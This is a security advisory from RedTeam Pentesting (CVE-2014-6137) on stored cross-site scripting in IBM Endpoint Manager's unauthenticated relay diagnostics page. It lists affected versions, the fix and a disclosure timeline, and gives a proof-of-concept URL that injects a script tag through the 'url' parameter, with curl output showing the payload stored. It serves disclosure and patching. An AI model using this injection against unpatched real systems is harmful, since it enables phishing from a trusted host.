IBM Endpoint Manager 9.1.x / 9.2.x Cross Site Scripting

`Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics  
Page  
  
During a penetration test, RedTeam Pentesting discovered that the IBM  
Endpoint Manager Relay Diagnostics page allows anybody to persistently  
store HTML and JavaScript code that is executed when the page is opened  
in a browser.  
  
  
Details  
=======  
  
Product: IBM Endpoint Manager  
Affected Versions: 9.1.x versions earlier than 9.1.1229,  
9.2.x versions earlier than 9.2.1.48  
Fixed Versions: 9.1.1229, 9.2.1.48  
Vulnerability Type: Cross-Site Scripting  
Security Risk: medium  
Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family  
Vendor Status: fixed version released  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013  
Advisory Status: published  
CVE: CVE-2014-6137  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137  
  
  
Introduction  
============  
  
IBM Endpoint Manager products - built on IBM BigFix technology - can  
help you achieve smarter, faster endpoint management and security. These  
products enable you to see and manage physical and virtual endpoints  
including servers, desktops, notebooks, smartphones, tablets and  
specialized equipment such as point-of-sale devices, ATMs and  
self-service kiosks. Now you can rapidly remediate, protect and report  
on endpoints in near real time.  
  
(from the vendor's homepage)  
  
  
More Details  
============  
  
Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint  
Manager, or TEM) components, such as TEM Root Servers or TEM Relays,  
typically serve HTTP and HTTPS on port 52311. There, the server or relay  
diagnostics page is normally accessible at the path /rd. That page can  
be accessed without authentication and lets users query and modify  
different information. For example, a TEM Relay can be instructed to  
gather a specific version of a certain Fixlet site by requesting a URL  
such as the following:  
  
http://tem-relay.example.com:52311/cgi-bin/bfenterprise/  
BESGatherMirrorNew.exe/-gatherversion  
?Body=GatherSpecifiedVersion  
&url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite  
&version=1  
&useCRC=0  
  
The URL parameter url is susceptible to cross-site scripting. When the  
following URL is requested, the browser executes the JavaScript code  
provided in the parameter:  
  
http://tem-relay.example.com:52311/cgi-bin/bfenterprise/  
BESGatherMirrorNew.exe/-gatherversion  
?Body=GatherSpecifiedVersion  
&version=1  
&url=http://"><script>alert(/XSS/)</script>  
&version=1  
&useCRC=0  
  
The value of that parameter is also stored in the TEM Relay's site list,  
so that the embedded JavaScript code is executed whenever the  
diagnostics page is opened in a browser:  
  
$ curl http://tem-relay.example.com:52311/rd  
[...]  
  
<select NAME="url">  
[...]  
<option>http://"><script>alert(/XSS/)</script></option>  
</select>  
  
  
Proof of Concept  
================  
  
http://tem-relay.example.com:52311/cgi-bin/bfenterprise/  
BESGatherMirrorNew.exe/-gatherversion  
?Body=GatherSpecifiedVersion&version=1  
&url=http://"><script>alert(/XSS/)</script>  
&version=1  
&useCRC=0  
  
  
Fix  
===  
  
Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48.  
  
  
Security Risk  
=============  
  
As the relay diagnostics page is typically not frequented by  
administrators and does not normally require authentication, it is  
unlikely that the vulnerability can be exploited to automatically and  
reliably attack administrative users and obtain their credentials.  
  
Nevertheless, the ability to host arbitrary HTML and JavaScript code on  
the relay diagnostics page, i.e. on a trusted system, may allow  
attackers to conduct very convincing phishing attacks.  
  
This vulnerability is therefore rated as a medium risk.  
  
  
Timeline  
========  
  
2014-07-29 Vulnerability identified during a penetration test  
2014-08-06 Customer approves disclosure to vendor  
2014-09-03 Vendor notified  
2015-01-13 Vendor releases security bulletin and software upgrade  
2015-02-04 Customer approves public disclosure  
2015-02-10 Advisory released  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests, short pentests,  
performed by a team of specialised IT-security experts. Hereby, security  
weaknesses in company networks or products are uncovered and can be  
fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at  
https://www.redteam-pentesting.de.  
  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
`